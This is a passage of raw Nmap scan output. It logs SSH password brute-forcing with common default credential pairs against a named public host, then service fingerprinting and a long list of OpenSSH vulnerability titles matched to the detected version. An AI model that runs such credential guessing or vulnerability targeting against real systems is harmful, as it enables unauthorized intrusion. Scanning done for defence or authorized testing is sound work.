2302NSE: [ssh-brute] Trying username/password pair: guest:justin
2303NSE: [ssh-brute] Trying username/password pair: user:justin
2304NSE: [ssh-brute] Trying username/password pair: web:justin
2305NSE: [ssh-brute] Trying username/password pair: test:justin
2306NSE: [ssh-brute] Trying username/password pair: root:liverpool
2307NSE: [ssh-brute] Trying username/password pair: admin:liverpool
2308NSE: [ssh-brute] Trying username/password pair: administrator:liverpool
2309NSE: [ssh-brute] Trying username/password pair: webadmin:liverpool
2310NSE: [ssh-brute] Trying username/password pair: sysadmin:liverpool
2311NSE: [ssh-brute] Trying username/password pair: netadmin:liverpool
2312NSE: [ssh-brute] Trying username/password pair: guest:liverpool
2313NSE: [ssh-brute] Trying username/password pair: user:liverpool
2314NSE: [ssh-brute] Trying username/password pair: web:liverpool
2315NSE: [ssh-brute] Trying username/password pair: test:liverpool
2316NSE: [ssh-brute] Trying username/password pair: root:football
2317NSE: [ssh-brute] Trying username/password pair: admin:football
2318NSE: [ssh-brute] Trying username/password pair: administrator:football
2319NSE: [ssh-brute] Trying username/password pair: webadmin:football
2320NSE: [ssh-brute] Trying username/password pair: sysadmin:football
2321NSE: [ssh-brute] Trying username/password pair: netadmin:football
2322NSE: [ssh-brute] Trying username/password pair: guest:football
2323NSE: [ssh-brute] Trying username/password pair: user:football
2324NSE: [ssh-brute] usernames: Time limit 3m00s exceeded.
2325NSE: [ssh-brute] usernames: Time limit 3m00s exceeded.
2326NSE: [ssh-brute] passwords: Time limit 3m00s exceeded.
2327Nmap scan report for www.ygmt.info (185.82.200.52)
2328Host is up (0.10s latency).
2329rDNS record for 185.82.200.52: latina.petite.guru
2330
2331PORT STATE SERVICE VERSION
233222/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
2333| ssh-auth-methods:
2334| Supported authentication methods:
2335| publickey
2336|_ password
2337| ssh-brute:
2338| Accounts: No valid accounts found
2339|_ Statistics: Performed 408 guesses in 181 seconds, average tps: 2.6
2340| ssh-hostkey:
2341| 1024 7f:00:73:df:2a:6e:87:58:3f:76:07:05:5f:92:5b:8c (DSA)
2342| 2048 40:01:47:ca:ce:05:1c:b8:30:d2:2c:6d:bc:a7:eb:4c (RSA)
2343| 256 99:cb:fc:6d:e6:51:0d:46:73:06:0e:65:20:8c:c3:d0 (ECDSA)
2344|_ 256 9e:0b:2d:8f:86:18:26:96:72:48:2d:12:a3:d0:1a:78 (ED25519)
2345| ssh-publickey-acceptance:
2346|_ Accepted Public Keys: No public keys accepted
2347|_ssh-run: Failed to specify credentials and command to run.
2348| vulscan: VulDB - https://vuldb.com:
2349| [76870] OpenSSH up to 6.9 auth2-chall.c kbdint_next_device privilege escalation
2350| [76326] OpenSSH 6.8 XSECURITY privilege escalation
2351| [12724] OpenSSH up to 6.6 Fingerprint Record Check sshconnect.c verify_host_key HostCertificate weak authentication
2352| [12683] OpenBSD OpenSSH up to 6.5 Configuration child_set_env Wildcard privilege escalation
2353| [12124] OpenSSH 6.4 J-PAKE Protocol schnorr.c hash_buffer denial of service
2354| [11124] OpenSSH 6.2/6.3 Post Authentication sshd process initialize mm_newkeys_from_blob privilege escalation
2355|
2356| MITRE CVE - https://cve.mitre.org:
2357| [CVE-2012-5975] The SSH USERAUTH CHANGE REQUEST feature in SSH Tectia Server 6.0.4 through 6.0.20, 6.1.0 through 6.1.12, 6.2.0 through 6.2.5, and 6.3.0 through 6.3.2 on UNIX and Linux, when old-style password authentication is enabled, allows remote attackers to bypass authentication via a crafted session involving entry of blank passwords, as demonstrated by a root login session from a modified OpenSSH client with an added input_userauth_passwd_changereq call in sshconnect2.c.
2358| [CVE-2012-5536] A certain Red Hat build of the pam_ssh_agent_auth module on Red Hat Enterprise Linux (RHEL) 6 and Fedora Rawhide calls the glibc error function instead of the error function in the OpenSSH codebase, which allows local users to obtain sensitive information from process memory or possibly gain privileges via crafted use of an application that relies on this module, as demonstrated by su and sudo.
2359| [CVE-2010-5107] The default configuration of OpenSSH through 6.1 enforces a fixed time limit between establishing a TCP connection and completing a login, which makes it easier for remote attackers to cause a denial of service (connection-slot exhaustion) by periodically making many new TCP connections.
2360| [CVE-2008-1483] OpenSSH 4.3p2, and probably other versions, allows local users to hijack forwarded X connections by causing ssh to set DISPLAY to :10, even when another process is listening on the associated port, as demonstrated by opening TCP port 6010 (IPv4) and sniffing a cookie sent by Emacs.
2361| [CVE-2007-3102] Unspecified vulnerability in the linux_audit_record_event function in OpenSSH 4.3p2, as used on Fedora Core 6 and possibly other systems, allows remote attackers to write arbitrary characters to an audit log via a crafted username. NOTE: some of these details are obtained from third party information.
2362| [CVE-2004-2414] Novell NetWare 6.5 SP 1.1, when installing or upgrading using the Overlay CDs and performing a custom installation with OpenSSH, includes sensitive password information in the (1) NIOUTPUT.TXT and (2) NI.LOG log files, which might allow local users to obtain the passwords.
2363|
2364| SecurityFocus - https://www.securityfocus.com/bid/:
2365| [102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities
2366| [101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability
2367| [94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability
2368| [94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability
2369| [94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability
2370| [94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability
2371| [93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability
2372| [92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability
2373| [92210] OpenSSH CBC Padding Weak Encryption Security Weakness
2374| [92209] OpenSSH MAC Verification Security Bypass Vulnerability
2375| [91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability
2376| [90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability
2377| [90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability
2378| [89385] OpenSSH CVE-2005-2666 Local Security Vulnerability
2379| [88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability
2380| [88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability
2381| [88367] OpenSSH CVE-1999-1010 Local Security Vulnerability
2382| [87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability
2383| [86187] OpenSSH 'session.c' Local Security Bypass Vulnerability
2384| [86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability
2385| [84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability
2386| [84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability
2387| [84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability
2388| [81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability
2389| [80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability
2390| [80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability
2391| [76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability
2392| [76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities
2393| [75990] OpenSSH Login Handling Security Bypass Weakness
2394| [75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability
2395| [71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability
2396| [68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities
2397| [66459] OpenSSH Certificate Validation Security Bypass Vulnerability
2398| [66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability
2399| [65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability
2400| [65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability
2401| [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability
2402| [61286] OpenSSH Remote Denial of Service Vulnerability
2403| [58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability
2404| [58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability
2405| [54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability
2406| [51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability
2407| [50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability
2408| [49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness
2409| [48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability
2410| [47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability
2411| [46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
2412| [45304] OpenSSH J-PAKE Security Bypass Vulnerability
2413| [36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability
2414| [32319] OpenSSH CBC Mode Information Disclosure Vulnerability
2415| [30794] Red Hat OpenSSH Backdoor Vulnerability
2416| [30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability
2417| [30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability
2418| [28531] OpenSSH ForceCommand Command Execution Weakness
2419| [28444] OpenSSH X Connections Session Hijacking Vulnerability
2420| [26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness
2421| [25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability
2422| [23601] OpenSSH S/Key Remote Information Disclosure Vulnerability
2423| [20956] OpenSSH Privilege Separation Key Signature Weakness
2424| [20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness
2425| [20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness
2426| [20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability
2427| [20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability
2428| [16892] OpenSSH Remote PAM Denial Of Service Vulnerability
2429| [14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability
2430| [14729] OpenSSH GSSAPI Credential Disclosure Vulnerability
2431| [14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability
2432| [11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability
2433| [9986] RCP, OpenSSH SCP Client File Corruption Vulnerability
2434| [9040] OpenSSH PAM Conversation Memory Scrubbing Weakness
2435| [8677] Multiple Portable OpenSSH PAM Vulnerabilities
2436| [8628] OpenSSH Buffer Mismanagement Vulnerabilities
2437| [7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability
2438| [7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness
2439| [7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability
2440| [7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness
2441| [6168] OpenSSH Visible Password Vulnerability
2442| [5374] OpenSSH Trojan Horse Vulnerability
2443| [5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities
2444| [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
2445| [4241] OpenSSH Channel Code Off-By-One Vulnerability
2446| [3614] OpenSSH UseLogin Environment Variable Passing Vulnerability
2447| [3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability
2448| [3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability
2449| [3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability
2450| [2917] OpenSSH PAM Session Evasion Vulnerability
2451| [2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability
2452| [2356] OpenSSH Private Key Authentication Check Vulnerability
2453| [1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability
2454| [1334] OpenSSH UseLogin Vulnerability
2455|
2456| IBM X-Force - https://exchange.xforce.ibmcloud.com:
2457| [83258] GSI-OpenSSH auth-pam.c security bypass
2458| [82781] OpenSSH time limit denial of service
2459| [82231] OpenSSH pam_ssh_agent_auth PAM code execution
2460| [74809] OpenSSH ssh_gssapi_parse_ename denial of service
2461| [72756] Debian openssh-server commands information disclosure
2462| [68339] OpenSSH pam_thread buffer overflow
2463| [67264] OpenSSH ssh-keysign unauthorized access
2464| [65910] OpenSSH remote_glob function denial of service
2465| [65163] OpenSSH certificate information disclosure
2466| [64387] OpenSSH J-PAKE security bypass
2467| [63337] Cisco Unified Videoconferencing OpenSSH weak security
2468| [46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure
2469| [45202] OpenSSH signal handler denial of service
2470| [44747] RHEL OpenSSH backdoor
2471| [44280] OpenSSH PermitRootLogin information disclosure
2472| [44279] OpenSSH sshd weak security
2473| [44037] OpenSSH sshd SELinux role unauthorized access
2474| [43940] OpenSSH X11 forwarding information disclosure
2475| [41549] OpenSSH ForceCommand directive security bypass
2476| [41438] OpenSSH sshd session hijacking
2477| [40897] OpenSSH known_hosts weak security
2478| [40587] OpenSSH username weak security
2479| [37371] OpenSSH username data manipulation
2480| [37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed
2481| [37112] RHSA update for OpenSSH signal handler race condition not installed
2482| [37107] RHSA update for OpenSSH identical block denial of service not installed
2483| [36637] OpenSSH X11 cookie privilege escalation
2484| [35167] OpenSSH packet.c newkeys[mode] denial of service
2485| [34490] OpenSSH OPIE information disclosure
2486| [33794] OpenSSH ChallengeResponseAuthentication information disclosure
2487| [32975] Apple Mac OS X OpenSSH denial of service
2488| [32387] RHSA-2006:0738 updates for openssh not installed
2489| [32359] RHSA-2006:0697 updates for openssh not installed
2490| [32230] RHSA-2006:0298 updates for openssh not installed
2491| [32132] RHSA-2006:0044 updates for openssh not installed
2492| [30120] OpenSSH privilege separation monitor authentication verification weakness
2493| [29255] OpenSSH GSSAPI user enumeration
2494| [29254] OpenSSH signal handler race condition
2495| [29158] OpenSSH identical block denial of service
2496| [28147] Apple Mac OS X OpenSSH nonexistent user login denial of service
2497| [25116] OpenSSH OpenPAM denial of service
2498| [24305] OpenSSH SCP shell expansion command execution
2499| [22665] RHSA-2005:106 updates for openssh not installed
2500| [22117] OpenSSH GSSAPI allows elevated privileges
2501| [22115] OpenSSH GatewayPorts security bypass
2502| [20930] OpenSSH sshd.c LoginGraceTime denial of service
2503| [19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service
2504| [17213] OpenSSH allows port bouncing attacks
2505| [16323] OpenSSH scp file overwrite
2506| [13797] OpenSSH PAM information leak
2507| [13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack
2508| [13264] OpenSSH PAM code could allow an attacker to gain access
2509| [13215] OpenSSH buffer management errors could allow an attacker to execute code
2510| [13214] OpenSSH memory vulnerabilities
2511| [13191] OpenSSH large packet buffer overflow
2512| [12196] OpenSSH could allow an attacker to bypass login restrictions
2513| [11970] OpenSSH could allow an attacker to obtain valid administrative account
2514| [11902] OpenSSH PAM support enabled information leak
2515| [9803] OpenSSH "
2516| [9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse
2517| [9307] OpenSSH is running on the system
2518| [9169] OpenSSH "
2519| [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
2520| [8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database
2521| [8383] OpenSSH off-by-one error in channel code
2522| [7647] OpenSSH UseLogin option arbitrary code execution
2523| [7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions
2524| [7598] OpenSSH with Kerberos allows attacker to gain elevated privileges
2525| [7179] OpenSSH source IP access control bypass
2526| [6757] OpenSSH "
2527| [6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files
2528| [6084] OpenSSH 2.3.1 allows remote users to bypass authentication
2529| [5517] OpenSSH allows unauthorized access to resources
2530| [4646] OpenSSH UseLogin option allows remote users to execute commands as root
2531|
2532| Exploit-DB - https://www.exploit-db.com:
2533| [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow
2534|
2535| OpenVAS (Nessus) - http://www.openvas.org:
2536| [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
2537| [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
2538| [881183] CentOS Update for openssh CESA-2012:0884 centos6
2539| [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
2540| [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
2541| [870763] RedHat Update for openssh RHSA-2012:0884-04
2542| [870129] RedHat Update for openssh RHSA-2008:0855-01
2543| [861813] Fedora Update for openssh FEDORA-2010-5429
2544| [861319] Fedora Update for openssh FEDORA-2007-395
2545| [861170] Fedora Update for openssh FEDORA-2007-394
2546| [861012] Fedora Update for openssh FEDORA-2007-715
2547| [840345] Ubuntu Update for openssh vulnerability USN-597-1
2548| [840300] Ubuntu Update for openssh update USN-612-5
2549| [840271] Ubuntu Update for openssh vulnerability USN-612-2
2550| [840268] Ubuntu Update for openssh update USN-612-7
2551| [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
2552| [840214] Ubuntu Update for openssh vulnerability USN-566-1
2553| [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
2554| [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
2555| [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
2556| [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
2557| [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
2558| [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
2559| [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
2560| [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
2561| [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
2562| [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
2563| [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
2564| [100584] OpenSSH X Connections Session Hijacking Vulnerability
2565| [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
2566| [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
2567| [65987] SLES10: Security update for OpenSSH
2568| [65819] SLES10: Security update for OpenSSH
2569| [65514] SLES9: Security update for OpenSSH
2570| [65513] SLES9: Security update for OpenSSH
2571| [65334] SLES9: Security update for OpenSSH
2572| [65248] SLES9: Security update for OpenSSH
2573| [65218] SLES9: Security update for OpenSSH
2574| [65169] SLES9: Security update for openssh,openssh-askpass
2575| [65126] SLES9: Security update for OpenSSH
2576| [65019] SLES9: Security update for OpenSSH
2577| [65015] SLES9: Security update for OpenSSH
2578| [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
2579| [61639] Debian Security Advisory DSA 1638-1 (openssh)
2580| [61030] Debian Security Advisory DSA 1576-2 (openssh)
2581| [61029] Debian Security Advisory DSA 1576-1 (openssh)
2582| [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
2583| [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
2584| [60667] Slackware Advisory SSA:2008-095-01 openssh
2585| [59014] Slackware Advisory SSA:2007-255-01 openssh
2586| [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
2587| [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
2588| [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
2589| [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
2590| [57492] Slackware Advisory SSA:2006-272-02 openssh
2591| [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
2592| [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
2593| [57470] FreeBSD Ports: openssh
2594| [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
2595| [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
2596| [56294] Slackware Advisory SSA:2006-045-06 openssh
2597| [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
2598| [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
2599| [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
2600| [53788] Debian Security Advisory DSA 025-1 (openssh)
2601| [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
2602| [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
2603| [11343] OpenSSH Client Unauthorized Remote Forwarding
2604| [10954] OpenSSH AFS/Kerberos ticket/token passing
2605| [10883] OpenSSH Channel Code Off by 1
2606| [10823] OpenSSH UseLogin Environment Variables
2607|
2608| SecurityTracker - https://www.securitytracker.com:
2609| [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
2610| [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
2611| [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
2612| [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
2613| [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
2614| [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
2615| [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
2616| [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
2617| [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
2618| [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
2619| [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
2620| [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
2621| [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
2622| [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
2623| [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
2624| [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
2625| [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
2626| [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
2627| [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
2628| [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
2629| [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
2630| [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
2631| [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
2632| [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
2633| [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
2634| [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
2635| [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
2636| [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
2637| [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
2638| [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
2639| [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
2640| [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
2641| [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
2642| [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
2643| [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
2644| [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
2645| [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
2646| [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
2647|
2648| OSVDB - http://www.osvdb.org:
2649| [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
2650| [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
2651| [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
2652| [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
2653| [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
2654| [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
2655| [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
2656| [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
2657| [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
2658| [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
2659| [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
2660| [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
2661| [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
2662| [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
2663| [56921] OpenSSH Unspecified Remote Compromise
2664| [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
2665| [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
2666| [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
2667| [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
2668| [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
2669| [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
2670| [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
2671| [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
2672| [43745] OpenSSH X11 Forwarding Local Session Hijacking
2673| [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
2674| [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
2675| [37315] pam_usb OpenSSH Authentication Unspecified Issue
2676| [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
2677| [34601] OPIE w/ OpenSSH Account Enumeration
2678| [34600] OpenSSH S/KEY Authentication Account Enumeration
2679| [32721] OpenSSH Username Password Complexity Account Enumeration
2680| [30232] OpenSSH Privilege Separation Monitor Weakness
2681| [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
2682| [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
2683| [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
2684| [29152] OpenSSH Identical Block Packet DoS
2685| [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
2686| [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
2687| [22692] OpenSSH scp Command Line Filename Processing Command Injection
2688| [20216] OpenSSH with KerberosV Remote Authentication Bypass
2689| [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
2690| [19141] OpenSSH GSSAPIAuthentication Credential Escalation
2691| [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
2692| [16567] OpenSSH Privilege Separation LoginGraceTime DoS
2693| [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
2694| [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
2695| [9550] OpenSSH scp Traversal Arbitrary File Overwrite
2696| [6601] OpenSSH *realloc() Unspecified Memory Errors
2697| [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
2698| [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
2699| [6072] OpenSSH PAM Conversation Function Stack Modification
2700| [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
2701| [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
2702| [5408] OpenSSH echo simulation Information Disclosure
2703| [5113] OpenSSH NIS YP Netgroups Authentication Bypass
2704| [4536] OpenSSH Portable AIX linker Privilege Escalation
2705| [3938] OpenSSL and OpenSSH /dev/random Check Failure
2706| [3456] OpenSSH buffer_append_space() Heap Corruption
2707| [2557] OpenSSH Multiple Buffer Management Multiple Overflows
2708| [2140] OpenSSH w/ PAM Username Validity Timing Attack
2709| [2112] OpenSSH Reverse DNS Lookup Bypass
2710| [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
2711| [1853] OpenSSH Symbolic Link 'cookies' File Removal
2712| [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
2713| [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
2714| [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
2715| [688] OpenSSH UseLogin Environment Variable Local Command Execution
2716| [642] OpenSSH Multiple Key Type ACL Bypass
2717| [504] OpenSSH SSHv2 Public Key Authentication Bypass
2718| [341] OpenSSH UseLogin Local Privilege Escalation
2719|_
2720Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2721Device type: general purpose|broadband router|WAP|webcam
2722Running (JUST GUESSING): Linux 3.X|2.6.X|2.4.X (95%), Asus embedded (94%), AXIS embedded (94%)
2723OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:2.6 cpe:/h:asus:rt-ac66u cpe:/h:asus:rt-n10 cpe:/h:axis:211_network_camera cpe:/o:linux:linux_kernel:2.6.20 cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:3.8
